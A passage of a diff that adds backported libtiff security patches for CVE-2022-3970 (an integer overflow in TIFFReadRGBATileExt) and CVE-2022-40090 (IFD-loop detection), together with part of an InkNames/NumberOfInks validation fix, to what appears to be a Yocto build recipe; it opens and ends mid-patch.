+ 
+ /*
+- * Confirm we have "samplesperpixel" ink names separated by \0.  Returns 
++ * Count ink names separated by \0.  Returns
+  * zero if the ink names are not as expected.
+  */
+-static uint32
+-checkInkNamesString(TIFF* tif, uint32 slen, const char* s)
++static uint16
++countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+-	TIFFDirectory* td = &tif->tif_dir;
+-	uint16 i = td->td_samplesperpixel;
++	uint16 i = 0;
++	const char *ep = s + slen;
++	const char *cp = s;
+ 
+ 	if (slen > 0) {
+-		const char* ep = s+slen;
+-		const char* cp = s;
+-		for (; i > 0; i--) {
++		do {
+ 			for (; cp < ep && *cp != '\0'; cp++) {}
+ 			if (cp >= ep)
+ 				goto bad;
+ 			cp++;				/* skip \0 */
+-		}
+-		return ((uint32)(cp-s));
++			i++;
++		} while (cp < ep);
++		return (i);
+ 	}
+ bad:
+ 	TIFFErrorExt(tif->tif_clientdata, "TIFFSetField",
+-	    "%s: Invalid InkNames value; expecting %d names, found %d",
+-	    tif->tif_name,
+-	    td->td_samplesperpixel,
+-	    td->td_samplesperpixel-i);
++		"%s: Invalid InkNames value; no NUL at given buffer end location %"PRIu32", after %"PRIu16" ink",
++		tif->tif_name, slen, i);
+ 	return (0);
+ }
+ 
+@@ -476,13 +475,61 @@ _TIFFVSetField(TIFF* tif, uint32 tag, va_list ap)
+ 		_TIFFsetFloatArray(&td->td_refblackwhite, va_arg(ap, float*), 6);
+ 		break;
+ 	case TIFFTAG_INKNAMES:
+-		v = (uint16) va_arg(ap, uint16_vap);
+-		s = va_arg(ap, char*);
+-		v = checkInkNamesString(tif, v, s);
+-		status = v > 0;
+-		if( v > 0 ) {
+-			_TIFFsetNString(&td->td_inknames, s, v);
+-			td->td_inknameslen = v;
++		{
++			v = (uint16) va_arg(ap, uint16_vap);
++			s = va_arg(ap, char*);
++			uint16 ninksinstring;
++			ninksinstring = countInkNamesString(tif, v, s);
++			status = ninksinstring > 0;
++			if(ninksinstring > 0 ) {
++				_TIFFsetNString(&td->td_inknames, s, v);
++				td->td_inknameslen = v;
++				/* Set NumberOfInks to the value ninksinstring */
++				if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++				{
++					if (td->td_numberofinks != ninksinstring) {
++						TIFFErrorExt(tif->tif_clientdata, module,
++							"Warning %s; Tag %s:\n  Value %"PRIu16" of NumberOfInks is different from the number of inks %"PRIu16".\n  -> NumberOfInks value adapted to %"PRIu16"",
++							tif->tif_name, fip->field_name, td->td_numberofinks, ninksinstring, ninksinstring);
++						td->td_numberofinks = ninksinstring;
++					}
++				} else {
++					td->td_numberofinks = ninksinstring;
++					TIFFSetFieldBit(tif, FIELD_NUMBEROFINKS);
++				}
++				if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++				{
++					if (td->td_numberofinks != td->td_samplesperpixel) {
++						TIFFErrorExt(tif->tif_clientdata, module,
++							"Warning %s; Tag %s:\n  Value %"PRIu16" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++							tif->tif_name, fip->field_name, td->td_numberofinks, td->td_samplesperpixel);
++					}
++				}
++			}
++		}
++		break;
++	case TIFFTAG_NUMBEROFINKS:
++		v = (uint16)va_arg(ap, uint16_vap);
++		/* If InkNames already set also NumberOfInks is set accordingly and should be equal */
++		if (TIFFFieldSet(tif, FIELD_INKNAMES))
++		{
++			if (v != td->td_numberofinks) {
++				TIFFErrorExt(tif->tif_clientdata, module,
++					"Error %s; Tag %s:\n  It is not possible to set the value %"PRIu32" for NumberOfInks\n  which is different from the number of inks in the InkNames tag (%"PRIu16")",
++					tif->tif_name, fip->field_name, v, td->td_numberofinks);
++				/* Do not set / overwrite number of inks already set by InkNames case accordingly. */
++				status = 0;
++			}
++		} else {
++			td->td_numberofinks = (uint16)v;
++			if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++			{
++				if (td->td_numberofinks != td->td_samplesperpixel) {
++					TIFFErrorExt(tif->tif_clientdata, module,
++						"Warning %s; Tag %s:\n  Value %"PRIu32" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++						tif->tif_name, fip->field_name, v, td->td_samplesperpixel);
++				}
++			}
+ 		}
+ 		break;
+ 	case TIFFTAG_PERSAMPLE:
+@@ -887,34 +934,6 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ 	if (fip->field_bit == FIELD_CUSTOM) {
+ 		standard_tag = 0;
+ 	}
+-	
+-        if( standard_tag == TIFFTAG_NUMBEROFINKS )
+-        {
+-            int i;
+-            for (i = 0; i < td->td_customValueCount; i++) {
+-                uint16 val;
+-                TIFFTagValue *tv = td->td_customValues + i;
+-                if (tv->info->field_tag != standard_tag)
+-                    continue;
+-                if( tv->value == NULL )
+-                    return 0;
+-                val = *(uint16 *)tv->value;
+-                /* Truncate to SamplesPerPixel, since the */
+-                /* setting code for INKNAMES assume that there are SamplesPerPixel */
+-                /* inknames. */
+-                /* Fixes http://bugzilla.maptools.org/show_bug.cgi?id=2599 */
+-                if( val > td->td_samplesperpixel )
+-                {
+-                    TIFFWarningExt(tif->tif_clientdata,"_TIFFVGetField",
+-                                   "Truncating NumberOfInks from %u to %u",
+-                                   val, td->td_samplesperpixel);
+-                    val = td->td_samplesperpixel;
+-                }
+-                *va_arg(ap, uint16*) = val;
+-                return 1;
+-            }
+-            return 0;
+-        }
+ 
+ 	switch (standard_tag) {
+ 		case TIFFTAG_SUBFILETYPE:
+@@ -1092,6 +1111,9 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ 		case TIFFTAG_INKNAMES:
+ 			*va_arg(ap, char**) = td->td_inknames;
+ 			break;
++		case TIFFTAG_NUMBEROFINKS:
++			*va_arg(ap, uint16 *) = td->td_numberofinks;
++			break;
+ 		default:
+ 			{
+ 				int i;
+diff --git a/libtiff/tif_dir.h b/libtiff/tif_dir.h
+index e7f0667..7cad679 100644
+--- a/libtiff/tif_dir.h
++++ b/libtiff/tif_dir.h
+@@ -117,6 +117,7 @@ typedef struct {
+ 	/* CMYK parameters */
+ 	int     td_inknameslen;
+ 	char*   td_inknames;
++	uint16 td_numberofinks;                 /* number of inks in InkNames string */
+ 
+ 	int     td_customValueCount;
+         TIFFTagValue *td_customValues;
+@@ -174,6 +175,7 @@ typedef struct {
+ #define FIELD_TRANSFERFUNCTION         44
+ #define FIELD_INKNAMES                 46
+ #define FIELD_SUBIFD                   49
++#define FIELD_NUMBEROFINKS             50
+ /*      FIELD_CUSTOM (see tiffio.h)    65 */
+ /* end of support for well-known tags; codec-private tags follow */
+ #define FIELD_CODEC                    66  /* base of codec-private tags */
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index fbfaaf0..bf7de70 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -104,7 +104,7 @@ tiffFields[] = {
+ 	{ TIFFTAG_SUBIFD, -1, -1, TIFF_IFD8, 0, TIFF_SETGET_C16_IFD8, TIFF_SETGET_UNDEFINED, FIELD_SUBIFD, 1, 1, "SubIFD", (TIFFFieldArray*) &tiffFieldArray },
+ 	{ TIFFTAG_INKSET, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "InkSet", NULL },
+ 	{ TIFFTAG_INKNAMES, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_C16_ASCII, TIFF_SETGET_UNDEFINED, FIELD_INKNAMES, 1, 1, "InkNames", NULL },
+-	{ TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "NumberOfInks", NULL },
++	{ TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_NUMBEROFINKS, 1, 0, "NumberOfInks", NULL },
+ 	{ TIFFTAG_DOTRANGE, 2, 2, TIFF_SHORT, 0, TIFF_SETGET_UINT16_PAIR, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "DotRange", NULL },
+ 	{ TIFFTAG_TARGETPRINTER, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_ASCII, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "TargetPrinter", NULL },
+ 	{ TIFFTAG_EXTRASAMPLES, -1, -1, TIFF_SHORT, 0, TIFF_SETGET_C16_UINT16, TIFF_SETGET_UNDEFINED, FIELD_EXTRASAMPLES, 0, 1, "ExtraSamples", NULL },
+diff --git a/libtiff/tif_dirwrite.c b/libtiff/tif_dirwrite.c
+index 9e4d306..a2dbc3b 100644
+--- a/libtiff/tif_dirwrite.c
++++ b/libtiff/tif_dirwrite.c
+@@ -677,6 +677,11 @@ TIFFWriteDirectorySec(TIFF* tif, int isimage, int imagedone, uint64* pdiroff)
+ 				if (!TIFFWriteDirectoryTagAscii(tif,&ndir,dir,TIFFTAG_INKNAMES,tif->tif_dir.td_inknameslen,tif->tif_dir.td_inknames))
+ 					goto bad;
+ 			}
++			if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++			{
++				if (!TIFFWriteDirectoryTagShort(tif, &ndir, dir, TIFFTAG_NUMBEROFINKS, tif->tif_dir.td_numberofinks))
++					goto bad;
++			}
+ 			if (TIFFFieldSet(tif,FIELD_SUBIFD))
+ 			{
+ 				if (!TIFFWriteDirectoryTagSubifd(tif,&ndir,dir))
+diff --git a/libtiff/tif_print.c b/libtiff/tif_print.c
+index a073794..a9f05a7 100644
+--- a/libtiff/tif_print.c
++++ b/libtiff/tif_print.c
+@@ -402,6 +402,10 @@ TIFFPrintDirectory(TIFF* tif, FILE* fd, long flags)
+ 		}
+                 fputs("\n", fd);
+ 	}
++	if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS)) {
++		fprintf(fd, "  NumberOfInks: %d\n",
++			td->td_numberofinks);
++	}
+ 	if (TIFFFieldSet(tif,FIELD_THRESHHOLDING)) {
+ 		fprintf(fd, "  Thresholding: ");
+ 		switch (td->td_threshholding) {
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
new file mode 100644
index 0000000000..ea70827cbe
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
@@ -0,0 +1,45 @@
+From 7e87352217d1f0c77eee7033ac59e3aab08532bb Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 8 Nov 2022 15:16:58 +0100
+Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3970
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/227500897dfb07fb7d27f7aa570050e62617e3be
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ strips/tiles > 2 GB
+
+Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53137
+
+---
+ libtiff/tif_getimage.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 96ab146..0b90dcc 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -3042,15 +3042,15 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 col, uint32 row, uint32 * raster, int stop
+         return( ok );
+ 
+     for( i_row = 0; i_row < read_ysize; i_row++ ) {
+-        memmove( raster + (tile_ysize - i_row - 1) * tile_xsize,
+-                 raster + (read_ysize - i_row - 1) * read_xsize,
++        memmove( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
++                 raster + (size_t)(read_ysize - i_row - 1) * read_xsize,
+                  read_xsize * sizeof(uint32) );
+-        _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize+read_xsize,
++        _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize+read_xsize,
+                      0, sizeof(uint32) * (tile_xsize - read_xsize) );
+     }
+ 
+     for( i_row = read_ysize; i_row < tile_ysize; i_row++ ) {
+-        _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
++        _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
+                      0, sizeof(uint32) * tile_xsize );
+     }
+ 
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
new file mode 100644
index 0000000000..0a88f59553
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
@@ -0,0 +1,548 @@
+From d385738335deb0c4bb70449f12e411f2203c0d01 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 2 Sep 2022 21:20:28 +0200
+Subject: [PATCH 1/4] Improved IFD-Loop Handling (fixes #455)
+
+Basic approach:
+- The order in the entire chain must be checked, and not only whether an offset has already been read once.
+- To do this, pairs of directory number and offset are stored and checked.
+- The offset of a directory number can change.
+- TIFFAdvanceDirectory() must also perform an IFD loop check.
+- TIFFCheckDirOffset() is replaced by _TIFFCheckDirNumberAndOffset().
+
+Rules for the check:
+- If an offset is already in the list, it must have the same IFD number. Otherwise it is an IDF loop.
+- If the offset is not in the list and the IFD number is greater than there are list entries, a new list entry is added.
+- Otherwise, the offset of the IFD number is updated.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2022-40090.patch?h=ubuntu/focal-security
+Upstream commit
+https://gitlab.com/libtiff/libtiff/-/commit/c7caec9a4d8f24c17e667480d2c7d0d51c9fae41]
+CVE: CVE-2022-40090
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_close.c   |  6 ++-
+ libtiff/tif_dir.c     | 91 +++++++++++++++++++++++++----------------
+ libtiff/tif_dir.h     |  1 +
+ libtiff/tif_dirread.c | 94 ++++++++++++++++++++++++++++++-------------
+ libtiff/tif_open.c    |  3 +-
+ libtiff/tiffiop.h     |  3 +-
+ 6 files changed, 131 insertions(+), 67 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_close.c
++++ tiff-4.1.0+git191117/libtiff/tif_close.c
+@@ -52,8 +52,10 @@ TIFFCleanup(TIFF* tif)
+ 	(*tif->tif_cleanup)(tif);
+ 	TIFFFreeDirectory(tif);
+ 
+-	if (tif->tif_dirlist)
+-		_TIFFfree(tif->tif_dirlist);
++	if (tif->tif_dirlistoff)
++		_TIFFfree(tif->tif_dirlistoff);
++	if (tif->tif_dirlistdirn)
++		_TIFFfree(tif->tif_dirlistdirn);
+ 
+ 	/*
+          * Clean up client info links.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.c
++++ tiff-4.1.0+git191117/libtiff/tif_dir.c
+@@ -1463,12 +1463,22 @@ TIFFDefaultDirectory(TIFF* tif)
+ }
+ 
+ static int
+-TIFFAdvanceDirectory(TIFF* tif, uint64* nextdir, uint64* off)
++TIFFAdvanceDirectory(TIFF* tif, uint64* nextdiroff, uint64* off, uint16* nextdirnum)
+ {
+ 	static const char module[] = "TIFFAdvanceDirectory";
++
++	/* Add this directory to the directory list, if not already in. */
++	if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++		TIFFErrorExt(tif->tif_clientdata, module, "Starting directory %hu at offset 0x%lx (%lu) might cause an IFD loop",
++			*nextdirnum, *nextdiroff, *nextdiroff);
++		*nextdiroff = 0;
++		*nextdirnum = 0;
++		return(0);
++	}
++
+ 	if (isMapped(tif))
+ 	{
+-		uint64 poff=*nextdir;
++		uint64 poff=*nextdiroff;
+ 		if (!(tif->tif_flags&TIFF_BIGTIFF))
+ 		{
+ 			tmsize_t poffa,poffb,poffc,poffd;
+@@ -1479,7 +1489,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ 			if (((uint64)poffa!=poff)||(poffb<poffa)||(poffb<(tmsize_t)sizeof(uint16))||(poffb>tif->tif_size))
+ 			{
+ 				TIFFErrorExt(tif->tif_clientdata,module,"Error fetching directory count");
+-                                  *nextdir=0;
++                                  *nextdiroff=0;
+ 				return(0);
+ 			}
+ 			_TIFFmemcpy(&dircount,tif->tif_base+poffa,sizeof(uint16));
+@@ -1497,7 +1507,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ 			_TIFFmemcpy(&nextdir32,tif->tif_base+poffc,sizeof(uint32));
+ 			if (tif->tif_flags&TIFF_SWAB)
+ 				TIFFSwabLong(&nextdir32);
+-			*nextdir=nextdir32;
++			*nextdiroff=nextdir32;
+ 		}
+ 		else
+ 		{
+@@ -1529,11 +1539,10 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ 			}
+ 			if (off!=NULL)
+ 				*off=(uint64)poffc;
+-			_TIFFmemcpy(nextdir,tif->tif_base+poffc,sizeof(uint64));
++			_TIFFmemcpy(nextdiroff,tif->tif_base+poffc,sizeof(uint64));
+ 			if (tif->tif_flags&TIFF_SWAB)
+-				TIFFSwabLong8(nextdir);
++				TIFFSwabLong8(nextdiroff);
+ 		}
+-		return(1);
+ 	}
+ 	else
+ 	{
+@@ -1541,7 +1550,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ 		{
+ 			uint16 dircount;
+ 			uint32 nextdir32;
+-			if (!SeekOK(tif, *nextdir) ||
++			if (!SeekOK(tif, *nextdiroff) ||
+ 			    !ReadOK(tif, &dircount, sizeof (uint16))) {
+ 				TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ 				    tif->tif_name);
+@@ -1562,13 +1571,13 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ 			}
+ 			if (tif->tif_flags & TIFF_SWAB)
+ 				TIFFSwabLong(&nextdir32);
+-			*nextdir=nextdir32;
++			*nextdiroff=nextdir32;
+ 		}
+ 		else
+ 		{
+ 			uint64 dircount64;
+ 			uint16 dircount16;
+-			if (!SeekOK(tif, *nextdir) ||
++			if (!SeekOK(tif, *nextdiroff) ||
+ 			    !ReadOK(tif, &dircount64, sizeof (uint64))) {
+ 				TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ 				    tif->tif_name);
+@@ -1588,17 +1597,27 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ 			else
+ 				(void) TIFFSeekFile(tif,
+ 				    dircount16*20, SEEK_CUR);
+-			if (!ReadOK(tif, nextdir, sizeof (uint64))) {
++			if (!ReadOK(tif, nextdiroff, sizeof (uint64))) {
+ 				TIFFErrorExt(tif->tif_clientdata, module,
+                                              "%s: Error fetching directory link",
+ 				    tif->tif_name);
+ 				return (0);
+ 			}
+ 			if (tif->tif_flags & TIFF_SWAB)
+-				TIFFSwabLong8(nextdir);
++				TIFFSwabLong8(nextdiroff);
+ 		}
+-		return (1);
+ 	}
++	if (*nextdiroff != 0) {
++		(*nextdirnum)++;
++		/* Check next directory for IFD looping and if so, set it as last directory. */
++		if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++			TIFFWarningExt(tif->tif_clientdata, module, "the next directory %hu at offset 0x%lx (%lu) might be an IFD loop. Treating directory %hu as last directory",
++				*nextdirnum, *nextdiroff, *nextdiroff, *nextdirnum-1);
++			*nextdiroff = 0;
++			(*nextdirnum)--;
++		}
++	}
++	return (1);
+ }
+ 
+ /*
+@@ -1608,14 +1627,16 @@ uint16
+ TIFFNumberOfDirectories(TIFF* tif)
+ {
+ 	static const char module[] = "TIFFNumberOfDirectories";
+-	uint64 nextdir;
++	uint64 nextdiroff;
++	uint16 nextdirnum;
+ 	uint16 n;
+ 	if (!(tif->tif_flags&TIFF_BIGTIFF))
+-		nextdir = tif->tif_header.classic.tiff_diroff;
++		nextdiroff = tif->tif_header.classic.tiff_diroff;
+ 	else
+-		nextdir = tif->tif_header.big.tiff_diroff;
++		nextdiroff = tif->tif_header.big.tiff_diroff;
++	nextdirnum = 0;
+ 	n = 0;
+-	while (nextdir != 0 && TIFFAdvanceDirectory(tif, &nextdir, NULL))
++	while (nextdiroff != 0 && TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+         {
+                 if (n != 65535) {
+                         ++n;
+@@ -1638,28 +1659,30 @@ TIFFNumberOfDirectories(TIFF* tif)
+ int
+ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ {
+-	uint64 nextdir;
++	uint64 nextdiroff;
++	uint16 nextdirnum;
+ 	uint16 n;
+ 
+ 	if (!(tif->tif_flags&TIFF_BIGTIFF))
+-		nextdir = tif->tif_header.classic.tiff_diroff;
++		nextdiroff = tif->tif_header.classic.tiff_diroff;
+ 	else
+-		nextdir = tif->tif_header.big.tiff_diroff;
+-	for (n = dirn; n > 0 && nextdir != 0; n--)
+-		if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++		nextdiroff = tif->tif_header.big.tiff_diroff;
++	nextdirnum = 0;
++	for (n = dirn; n > 0 && nextdiroff != 0; n--)
++		if (!TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ 			return (0);
+-	tif->tif_nextdiroff = nextdir;
++	/* If the n-th directory could not be reached (does not exist), 
++	 * return here without touching anything further. */
++	if (nextdiroff == 0 || n > 0)
++		return (0);
++
++	tif->tif_nextdiroff = nextdiroff;
+ 	/*
+ 	 * Set curdir to the actual directory index.  The
+ 	 * -1 is because TIFFReadDirectory will increment
+ 	 * tif_curdir after successfully reading the directory.
+ 	 */
+ 	tif->tif_curdir = (dirn - n) - 1;
+-	/*
+-	 * Reset tif_dirnumber counter and start new list of seen directories.
+-	 * We need this to prevent IFD loops.
+-	 */
+-	tif->tif_dirnumber = 0;
+ 	return (TIFFReadDirectory(tif));
+ }
+ 
+@@ -1672,13 +1695,42 @@ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ int
+ TIFFSetSubDirectory(TIFF* tif, uint64 diroff)
+ {
+-	tif->tif_nextdiroff = diroff;
+-	/*
+-	 * Reset tif_dirnumber counter and start new list of seen directories.
+-	 * We need this to prevent IFD loops.
++	/* Match nextdiroff and curdir for consistent IFD-loop checking. 
++	 * Only with TIFFSetSubDirectory() the IFD list can be corrupted with invalid offsets
++	 * within the main IFD tree.
++	 * In the case of several subIFDs of a main image, 
++	 * there are two possibilities that are not even mutually exclusive.
++	 * a.) The subIFD tag contains an array with all offsets of the subIFDs.
++	 * b.) The SubIFDs are concatenated with their NextIFD parameters.
++	 * (refer to https://www.awaresystems.be/imaging/tiff/specification/TIFFPM6.pdf.)
+ 	 */
+-	tif->tif_dirnumber = 0;
+-	return (TIFFReadDirectory(tif));
++	int retval;
++	uint16 curdir = 0;
++	int8 probablySubIFD = 0;
++	if (diroff == 0) {
++		/* Special case to invalidate the tif_lastdiroff member. */
++		tif->tif_curdir = 65535;
++	} else {
++		if (!_TIFFGetDirNumberFromOffset(tif, diroff, &curdir)) {
++			/* Non-existing offsets might point to a SubIFD or invalid IFD.*/
++			probablySubIFD = 1;
++		}
++		/* -1 because TIFFReadDirectory() will increment tif_curdir. */
++		tif->tif_curdir = curdir - 1;
++	}
++
++	tif->tif_nextdiroff = diroff;
++	retval = TIFFReadDirectory(tif);
++	/* If failed, curdir was not incremented in TIFFReadDirectory(), so set it back. */
++	if (!retval )tif->tif_curdir++; 
++	if (retval && probablySubIFD) {
++		/* Reset IFD list to start new one for SubIFD chain and also start SubIFD chain with tif_curdir=0. */
++		tif->tif_dirnumber = 0; 
++		tif->tif_curdir = 0; /* first directory of new chain */
++		/* add this offset to new IFD list */
++		_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir, diroff);
++	}
++	return (retval);
+ }
+ 
+ /*
+@@ -1702,12 +1754,15 @@ TIFFLastDirectory(TIFF* tif)
+ 
+ /*
+  * Unlink the specified directory from the directory chain.
++ * Note: First directory starts with number dirn=1. 
++ * This is different to TIFFSetDirectory() where the first directory starts with zero.
+  */
+ int
+ TIFFUnlinkDirectory(TIFF* tif, uint16 dirn)
+ {
+ 	static const char module[] = "TIFFUnlinkDirectory";
+ 	uint64 nextdir;
++	uint16 nextdirnum;
+ 	uint64 off;
+ 	uint16 n;
+ 
+@@ -1731,19 +1786,21 @@ TIFFUnlinkDirectory(TIFF* tif, uint16 di
+ 		nextdir = tif->tif_header.big.tiff_diroff;
+ 		off = 8;
+ 	}
++	nextdirnum = 0;		/* First directory is dirn=0 */
++
+ 	for (n = dirn-1; n > 0; n--) {
+ 		if (nextdir == 0) {
+ 			TIFFErrorExt(tif->tif_clientdata, module, "Directory %d does not exist", dirn);
+ 			return (0);
+ 		}
+-		if (!TIFFAdvanceDirectory(tif, &nextdir, &off))
++		if (!TIFFAdvanceDirectory(tif, &nextdir, &off, &nextdirnum))
+ 			return (0);
+ 	}
+ 	/*
+ 	 * Advance to the directory to be unlinked and fetch
+ 	 * the offset of the directory that follows.
+ 	 */
+-	if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++	if (!TIFFAdvanceDirectory(tif, &nextdir, NULL, &nextdirnum))
+ 		return (0);
+ 	/*
+ 	 * Go back and patch the link field of the preceding
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.h
++++ tiff-4.1.0+git191117/libtiff/tif_dir.h
+@@ -300,6 +300,8 @@ extern int _TIFFMergeFields(TIFF*, const
+ extern const TIFFField* _TIFFFindOrRegisterField(TIFF *, uint32, TIFFDataType);
+ extern  TIFFField* _TIFFCreateAnonField(TIFF *, uint32, TIFFDataType);
+ extern int _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag);
++extern int _TIFFCheckDirNumberAndOffset(TIFF *tif, uint16 dirn, uint64 diroff);
++extern int _TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16 *dirn);
+ 
+ #if defined(__cplusplus)
+ }
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -158,7 +158,6 @@ static void TIFFReadDirectoryFindFieldIn
+ 
+ static int EstimateStripByteCounts(TIFF* tif, TIFFDirEntry* dir, uint16 dircount);
+ static void MissingRequired(TIFF*, const char*);
+-static int TIFFCheckDirOffset(TIFF* tif, uint64 diroff);
+ static int CheckDirCount(TIFF*, TIFFDirEntry*, uint32);
+ static uint16 TIFFFetchDirectory(TIFF* tif, uint64 diroff, TIFFDirEntry** pdir, uint64* nextdiroff);
+ static int TIFFFetchNormalTag(TIFF*, TIFFDirEntry*, int recover);
+@@ -3584,12 +3583,19 @@ TIFFReadDirectory(TIFF* tif)
+     int bitspersample_read = FALSE;
+         int color_channels;
+ 
+-	tif->tif_diroff=tif->tif_nextdiroff;
+-	if (!TIFFCheckDirOffset(tif,tif->tif_nextdiroff))
+-		return 0;           /* last offset or bad offset (IFD looping) */
+-	(*tif->tif_cleanup)(tif);   /* cleanup any previous compression state */
+-	tif->tif_curdir++;
+-        nextdiroff = tif->tif_nextdiroff;
++	if (tif->tif_nextdiroff == 0) {
++		/* In this special case, tif_diroff needs also to be set to 0. */
++		tif->tif_diroff = tif->tif_nextdiroff;
++		return 0;           /* last offset, thus no checking necessary */
++	}
++
++	nextdiroff = tif->tif_nextdiroff;
++	/* tif_curdir++ and tif_nextdiroff should only be updated after SUCCESSFUL reading of the directory. Otherwise, invalid IFD offsets could corrupt the IFD list. */
++	if (!_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir + 1, nextdiroff)) {
++		TIFFWarningExt(tif->tif_clientdata, module,
++			"Didn't read next directory due to IFD looping at offset 0x%lx (%lu) to offset 0x%lx (%lu)", tif->tif_diroff, tif->tif_diroff, nextdiroff, nextdiroff);
++		return 0;           /* bad offset (IFD looping) */
++	}
+ 	dircount=TIFFFetchDirectory(tif,nextdiroff,&dir,&tif->tif_nextdiroff);
+ 	if (!dircount)
+ 	{
+@@ -3597,6 +3603,11 @@ TIFFReadDirectory(TIFF* tif)
+ 		    "Failed to read directory at offset " TIFF_UINT64_FORMAT,nextdiroff);
+ 		return 0;
+ 	}
++	/* Set global values after a valid directory has been fetched.
++	 * tif_diroff is already set to nextdiroff in TIFFFetchDirectory() in the beginning. */
++	tif->tif_curdir++;
++	(*tif->tif_cleanup)(tif);   /* cleanup any previous compression state */
++
+ 	TIFFReadDirectoryCheckOrder(tif,dir,dircount);
+ 
+         /*
+@@ -4628,13 +4639,17 @@ MissingRequired(TIFF* tif, const char* t
+ }
+ 
+ /*
+- * Check the directory offset against the list of already seen directory
+- * offsets. This is a trick to prevent IFD looping. The one can create TIFF
+- * file with looped directory pointers. We will maintain a list of already
+- * seen directories and check every IFD offset against that list.
++ * Check the directory number and offset against the list of already seen
++ * directory numbers and offsets. This is a trick to prevent IFD looping.
++ * The one can create TIFF file with looped directory pointers. We will
++ * maintain a list of already seen directories and check every IFD offset
++ * and its IFD number against that list. However, the offset of an IFD number
++ * can change - e.g. when writing updates to file.
++ * Returns 1 if all is ok; 0 if last directory or IFD loop is encountered,
++ * or an error has occured.
+  */
+-static int
+-TIFFCheckDirOffset(TIFF* tif, uint64 diroff)
++int
++_TIFFCheckDirNumberAndOffset(TIFF* tif, uint16 dirn, uint64 diroff)
+ {
+ 	uint16 n;
+ 
+@@ -4646,35 +4661,64 @@ TIFFCheckDirOffset(TIFF* tif, uint64 dir
